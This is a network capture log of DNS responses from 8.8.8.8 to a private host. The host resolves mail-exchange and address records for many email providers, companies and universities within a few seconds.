Aug 24, 2021 08:48:11.628978968 CEST	8.8.8.8	192.168.2.7	0x6606	No error (0)	aigag.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.628978968 CEST	8.8.8.8	192.168.2.7	0x6606	No error (0)	aigag.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.628978968 CEST	8.8.8.8	192.168.2.7	0x6606	No error (0)	aigag.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.628978968 CEST	8.8.8.8	192.168.2.7	0x6606	No error (0)	aigag.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.628978968 CEST	8.8.8.8	192.168.2.7	0x6606	No error (0)	aigag.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.628978968 CEST	8.8.8.8	192.168.2.7	0x6606	No error (0)	aigag.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.628978968 CEST	8.8.8.8	192.168.2.7	0x6606	No error (0)	aigag.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.628978968 CEST	8.8.8.8	192.168.2.7	0x6606	No error (0)	aigag.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.628978968 CEST	8.8.8.8	192.168.2.7	0x6606	No error (0)	aigag.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.628978968 CEST	8.8.8.8	192.168.2.7	0x6606	No error (0)	aigag.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.735251904 CEST	8.8.8.8	192.168.2.7	0xebb6	No error (0)	am1mxi02.aig.com		167.230.100.41	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:11.752006054 CEST	8.8.8.8	192.168.2.7	0xae0f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:11.752006054 CEST	8.8.8.8	192.168.2.7	0xae0f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:11.853795052 CEST	8.8.8.8	192.168.2.7	0x6345	No error (0)	aig.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.853795052 CEST	8.8.8.8	192.168.2.7	0x6345	No error (0)	aig.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.853795052 CEST	8.8.8.8	192.168.2.7	0x6345	No error (0)	aig.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.853795052 CEST	8.8.8.8	192.168.2.7	0x6345	No error (0)	aig.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.853795052 CEST	8.8.8.8	192.168.2.7	0x6345	No error (0)	aig.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.853795052 CEST	8.8.8.8	192.168.2.7	0x6345	No error (0)	aig.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.853795052 CEST	8.8.8.8	192.168.2.7	0x6345	No error (0)	aig.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.853795052 CEST	8.8.8.8	192.168.2.7	0x6345	No error (0)	aig.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.853795052 CEST	8.8.8.8	192.168.2.7	0x6345	No error (0)	aig.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:11.853795052 CEST	8.8.8.8	192.168.2.7	0x6345	No error (0)	aig.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:12.025710106 CEST	8.8.8.8	192.168.2.7	0x59f5	No error (0)	am2mxi05.aig.com		167.230.144.44	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:12.193788052 CEST	8.8.8.8	192.168.2.7	0x31b3	No error (0)	stanford.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:12.193788052 CEST	8.8.8.8	192.168.2.7	0x31b3	No error (0)	stanford.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:12.350491047 CEST	8.8.8.8	192.168.2.7	0xfe46	No error (0)	live-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:12.350491047 CEST	8.8.8.8	192.168.2.7	0xfe46	No error (0)	live-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:12.369066000 CEST	8.8.8.8	192.168.2.7	0xc606	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:12.369066000 CEST	8.8.8.8	192.168.2.7	0xc606	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:12.422174931 CEST	8.8.8.8	192.168.2.7	0x210b	No error (0)	mxb-00000d03.gslb.pphosted.com		148.163.153.234	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:12.607887030 CEST	8.8.8.8	192.168.2.7	0xbeb6	No error (0)	netzero.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:12.607887030 CEST	8.8.8.8	192.168.2.7	0xbeb6	No error (0)	netzero.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:12.607933998 CEST	8.8.8.8	192.168.2.7	0xb3e	No error (0)	www.instagram.com	default-geo-p42.instagram.com		CNAME (Canonical name)	IN (0x0001)
Aug 24, 2021 08:48:12.607933998 CEST	8.8.8.8	192.168.2.7	0xb3e	No error (0)	default-geo-p42.instagram.com	z-p42-instagram.c10r.instagram.com		CNAME (Canonical name)	IN (0x0001)
Aug 24, 2021 08:48:12.607933998 CEST	8.8.8.8	192.168.2.7	0xb3e	No error (0)	z-p42-instagram.c10r.instagram.com		157.240.17.174	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:12.683248043 CEST	8.8.8.8	192.168.2.7	0x920e	No error (0)	mx.vgs.untd.com		64.136.52.37	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:12.969893932 CEST	8.8.8.8	192.168.2.7	0x4cbb	No error (0)	mywebtimes.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:12.969893932 CEST	8.8.8.8	192.168.2.7	0x4cbb	No error (0)	mywebtimes.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:13.050879002 CEST	8.8.8.8	192.168.2.7	0x6af1	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:13.050879002 CEST	8.8.8.8	192.168.2.7	0x6af1	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:13.170875072 CEST	8.8.8.8	192.168.2.7	0xd49c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:13.170875072 CEST	8.8.8.8	192.168.2.7	0xd49c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:13.180865049 CEST	8.8.8.8	192.168.2.7	0x7376	No error (0)	mxa-005be101.gslb.pphosted.com		205.220.165.221	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:13.576802015 CEST	8.8.8.8	192.168.2.7	0x4901	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:13.576802015 CEST	8.8.8.8	192.168.2.7	0x4901	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:13.624125957 CEST	8.8.8.8	192.168.2.7	0xc46b	No error (0)	dg.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:13.624125957 CEST	8.8.8.8	192.168.2.7	0xc46b	No error (0)	dg.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:13.698069096 CEST	8.8.8.8	192.168.2.7	0x6709	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:13.698069096 CEST	8.8.8.8	192.168.2.7	0x6709	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:13.856898069 CEST	8.8.8.8	192.168.2.7	0x63cf	No error (0)	mxa-00155702.gslb.pphosted.com		205.220.172.150	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:14.188847065 CEST	8.8.8.8	192.168.2.7	0x1a7d	No error (0)	wellsfargo.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:14.188847065 CEST	8.8.8.8	192.168.2.7	0x1a7d	No error (0)	wellsfargo.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:14.245166063 CEST	8.8.8.8	192.168.2.7	0x7f24	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:14.245166063 CEST	8.8.8.8	192.168.2.7	0x7f24	No error (0)	eur.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:14.247737885 CEST	8.8.8.8	192.168.2.7	0xdc31	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:14.247737885 CEST	8.8.8.8	192.168.2.7	0xdc31	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:14.251533031 CEST	8.8.8.8	192.168.2.7	0xe5ba	No error (0)	mxb-00004003.gslb.pphosted.com		205.220.165.101	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:14.439094067 CEST	8.8.8.8	192.168.2.7	0x2767	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:14.439094067 CEST	8.8.8.8	192.168.2.7	0x2767	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:14.698378086 CEST	8.8.8.8	192.168.2.7	0xba6d	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:14.698378086 CEST	8.8.8.8	192.168.2.7	0xba6d	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:14.890057087 CEST	8.8.8.8	192.168.2.7	0x6f82	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:14.890057087 CEST	8.8.8.8	192.168.2.7	0x6f82	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:15.205718040 CEST	8.8.8.8	192.168.2.7	0xb0c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:15.205718040 CEST	8.8.8.8	192.168.2.7	0xb0c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:15.436443090 CEST	8.8.8.8	192.168.2.7	0xa352	No error (0)	cc.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:15.436443090 CEST	8.8.8.8	192.168.2.7	0xa352	No error (0)	cc.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:15.508896112 CEST	8.8.8.8	192.168.2.7	0xc031	No error (0)	mxa-00262c01.gslb.pphosted.com		148.163.152.163	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:15.510587931 CEST	8.8.8.8	192.168.2.7	0x8889	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:15.510587931 CEST	8.8.8.8	192.168.2.7	0x8889	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:15.747951031 CEST	8.8.8.8	192.168.2.7	0xaf23	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:15.747951031 CEST	8.8.8.8	192.168.2.7	0xaf23	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:15.848124981 CEST	8.8.8.8	192.168.2.7	0xcced	No error (0)	peoplepc.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:15.848124981 CEST	8.8.8.8	192.168.2.7	0xcced	No error (0)	peoplepc.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:15.848124981 CEST	8.8.8.8	192.168.2.7	0xcced	No error (0)	peoplepc.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:15.848124981 CEST	8.8.8.8	192.168.2.7	0xcced	No error (0)	peoplepc.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:15.918231964 CEST	8.8.8.8	192.168.2.7	0x9676	No error (0)	mx01.oxsus-vadesecure.net		51.81.57.58	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:16.112005949 CEST	8.8.8.8	192.168.2.7	0xfec4	No error (0)	msn-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:16.112005949 CEST	8.8.8.8	192.168.2.7	0xfec4	No error (0)	msn-com.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:16.133090019 CEST	8.8.8.8	192.168.2.7	0xf89c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:16.133090019 CEST	8.8.8.8	192.168.2.7	0xf89c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:16.373625040 CEST	8.8.8.8	192.168.2.7	0xa080	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:16.373625040 CEST	8.8.8.8	192.168.2.7	0xa080	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:16.381375074 CEST	8.8.8.8	192.168.2.7	0xe95f	No error (0)	mx0.charter.net		47.43.18.9	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:16.705719948 CEST	8.8.8.8	192.168.2.7	0xf430	No error (0)	lycos.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:16.790652990 CEST	8.8.8.8	192.168.2.7	0xe9ec	No error (0)	mx.lycos.com.cust.b.hostedemail.com		64.98.36.4	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:16.795279026 CEST	8.8.8.8	192.168.2.7	0x8d18	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:16.795279026 CEST	8.8.8.8	192.168.2.7	0x8d18	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:16.893237114 CEST	8.8.8.8	192.168.2.7	0x6d74	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:16.893237114 CEST	8.8.8.8	192.168.2.7	0x6d74	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:17.271505117 CEST	8.8.8.8	192.168.2.7	0x9ccd	No error (0)	rediff.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:17.597327948 CEST	8.8.8.8	192.168.2.7	0xf5ac	No error (0)	a1future.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:17.597327948 CEST	8.8.8.8	192.168.2.7	0xf5ac	No error (0)	a1future.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:17.597327948 CEST	8.8.8.8	192.168.2.7	0xf5ac	No error (0)	a1future.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:17.597327948 CEST	8.8.8.8	192.168.2.7	0xf5ac	No error (0)	a1future.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:17.597327948 CEST	8.8.8.8	192.168.2.7	0xf5ac	No error (0)	a1future.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:17.865994930 CEST	8.8.8.8	192.168.2.7	0xf3d7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:17.865994930 CEST	8.8.8.8	192.168.2.7	0xf3d7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:17.880157948 CEST	8.8.8.8	192.168.2.7	0xc0e4	No error (0)	alt2.aspmx.l.google.com		74.125.200.27	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:18.495646954 CEST	8.8.8.8	192.168.2.7	0xdf56	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:18.495646954 CEST	8.8.8.8	192.168.2.7	0xdf56	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:18.496419907 CEST	8.8.8.8	192.168.2.7	0x5ef8	No error (0)	eur.olc.protection.outlook.com		104.47.13.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:18.496419907 CEST	8.8.8.8	192.168.2.7	0x5ef8	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:19.162013054 CEST	8.8.8.8	192.168.2.7	0xabad	No error (0)	almayagroup.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:19.322524071 CEST	8.8.8.8	192.168.2.7	0xd075	No error (0)	smtp.almaya.ae		151.253.14.172	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:19.493597031 CEST	8.8.8.8	192.168.2.7	0x686d	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:19.493597031 CEST	8.8.8.8	192.168.2.7	0x686d	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:20.912573099 CEST	8.8.8.8	192.168.2.7	0x2ed0	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:20.912573099 CEST	8.8.8.8	192.168.2.7	0x2ed0	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:21.432351112 CEST	8.8.8.8	192.168.2.7	0x8fd4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:21.432351112 CEST	8.8.8.8	192.168.2.7	0x8fd4	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:21.437783957 CEST	8.8.8.8	192.168.2.7	0xa0ca	No error (0)	msn-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:21.437783957 CEST	8.8.8.8	192.168.2.7	0xa0ca	No error (0)	msn-com.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:21.723285913 CEST	8.8.8.8	192.168.2.7	0xc773	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:21.723285913 CEST	8.8.8.8	192.168.2.7	0xc773	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:22.107409000 CEST	8.8.8.8	192.168.2.7	0x7dec	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:22.107409000 CEST	8.8.8.8	192.168.2.7	0x7dec	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:22.334165096 CEST	8.8.8.8	192.168.2.7	0x3138	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:22.334165096 CEST	8.8.8.8	192.168.2.7	0x3138	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:22.608431101 CEST	8.8.8.8	192.168.2.7	0x3ad6	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:22.608431101 CEST	8.8.8.8	192.168.2.7	0x3ad6	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:22.949594975 CEST	8.8.8.8	192.168.2.7	0xcada	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:22.949594975 CEST	8.8.8.8	192.168.2.7	0xcada	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:23.084945917 CEST	8.8.8.8	192.168.2.7	0x15de	No error (0)	fiu.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:23.084945917 CEST	8.8.8.8	192.168.2.7	0x15de	No error (0)	fiu.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:23.226927042 CEST	8.8.8.8	192.168.2.7	0x7174	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:23.226927042 CEST	8.8.8.8	192.168.2.7	0x7174	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:23.256073952 CEST	8.8.8.8	192.168.2.7	0xb7a4	No error (0)	mxa-000c9b01.gslb.pphosted.com		205.220.178.177	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:23.454895973 CEST	8.8.8.8	192.168.2.7	0xcc9f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:23.454895973 CEST	8.8.8.8	192.168.2.7	0xcc9f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:23.641870022 CEST	8.8.8.8	192.168.2.7	0xea14	No error (0)	mxa-000c9b01.gslb.pphosted.com		205.220.178.177	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:23.747838020 CEST	8.8.8.8	192.168.2.7	0x738f	No error (0)	msn-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:23.747838020 CEST	8.8.8.8	192.168.2.7	0x738f	No error (0)	msn-com.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:23.750087023 CEST	8.8.8.8	192.168.2.7	0xaf9	No error (0)	outlook-com.olc.protection.outlook.com		104.47.1.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:23.750087023 CEST	8.8.8.8	192.168.2.7	0xaf9	No error (0)	outlook-com.olc.protection.outlook.com		104.47.2.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:23.974272013 CEST	8.8.8.8	192.168.2.7	0x9f66	No error (0)	fairview.org			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:23.974272013 CEST	8.8.8.8	192.168.2.7	0x9f66	No error (0)	fairview.org			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:24.164736032 CEST	8.8.8.8	192.168.2.7	0xa6ad	No error (0)	mxa-0005f101.gslb.pphosted.com		208.84.65.44	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:24.385102034 CEST	8.8.8.8	192.168.2.7	0x435e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:24.385102034 CEST	8.8.8.8	192.168.2.7	0x435e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:24.568584919 CEST	8.8.8.8	192.168.2.7	0xddc1	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:24.568584919 CEST	8.8.8.8	192.168.2.7	0xddc1	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:24.630310059 CEST	8.8.8.8	192.168.2.7	0xb4fd	No error (0)	my.gcu.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:24.630310059 CEST	8.8.8.8	192.168.2.7	0xb4fd	No error (0)	my.gcu.edu			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:24.870383978 CEST	8.8.8.8	192.168.2.7	0xa408	No error (0)	mxa-005dfb01.gslb.pphosted.com		205.220.166.153	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:24.946305037 CEST	8.8.8.8	192.168.2.7	0x63a3	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:24.946305037 CEST	8.8.8.8	192.168.2.7	0x63a3	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.55.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:25.125139952 CEST	8.8.8.8	192.168.2.7	0x908	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:25.125139952 CEST	8.8.8.8	192.168.2.7	0x908	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:25.212840080 CEST	8.8.8.8	192.168.2.7	0x20a2	No error (0)	trends.google.com	www2.l.google.com		CNAME (Canonical name)	IN (0x0001)
Aug 24, 2021 08:48:25.212840080 CEST	8.8.8.8	192.168.2.7	0x20a2	No error (0)	www2.l.google.com		172.217.168.4	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:25.461543083 CEST	8.8.8.8	192.168.2.7	0x947e	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:25.461543083 CEST	8.8.8.8	192.168.2.7	0x947e	No error (0)	eur.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:25.473572969 CEST	8.8.8.8	192.168.2.7	0xc96c	No error (0)	mxa-0005f101.gslb.pphosted.com		208.86.201.25	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:25.647696972 CEST	8.8.8.8	192.168.2.7	0xe1e8	No error (0)	eur.olc.protection.outlook.com		104.47.14.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:25.647696972 CEST	8.8.8.8	192.168.2.7	0xe1e8	No error (0)	eur.olc.protection.outlook.com		104.47.12.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:25.749033928 CEST	8.8.8.8	192.168.2.7	0xe095	No error (0)	live-com.olc.protection.outlook.com		104.47.58.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:25.749033928 CEST	8.8.8.8	192.168.2.7	0xe095	No error (0)	live-com.olc.protection.outlook.com		104.47.70.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:25.833435059 CEST	8.8.8.8	192.168.2.7	0x2261	No error (0)	ae.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:25.833435059 CEST	8.8.8.8	192.168.2.7	0x2261	No error (0)	ae.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:25.928013086 CEST	8.8.8.8	192.168.2.7	0x1988	No error (0)	hotmail.ca			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:48:25.987215996 CEST	8.8.8.8	192.168.2.7	0xbd4f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:25.987215996 CEST	8.8.8.8	192.168.2.7	0xbd4f	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:26.050658941 CEST	8.8.8.8	192.168.2.7	0x76d7	No error (0)	mxa-0017bf01.gslb.pphosted.com		67.231.157.174	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:26.184608936 CEST	8.8.8.8	192.168.2.7	0x9703	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:26.184608936 CEST	8.8.8.8	192.168.2.7	0x9703	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:26.317349911 CEST	8.8.8.8	192.168.2.7	0xd423	No error (0)	trends.google.com	www2.l.google.com		CNAME (Canonical name)	IN (0x0001)
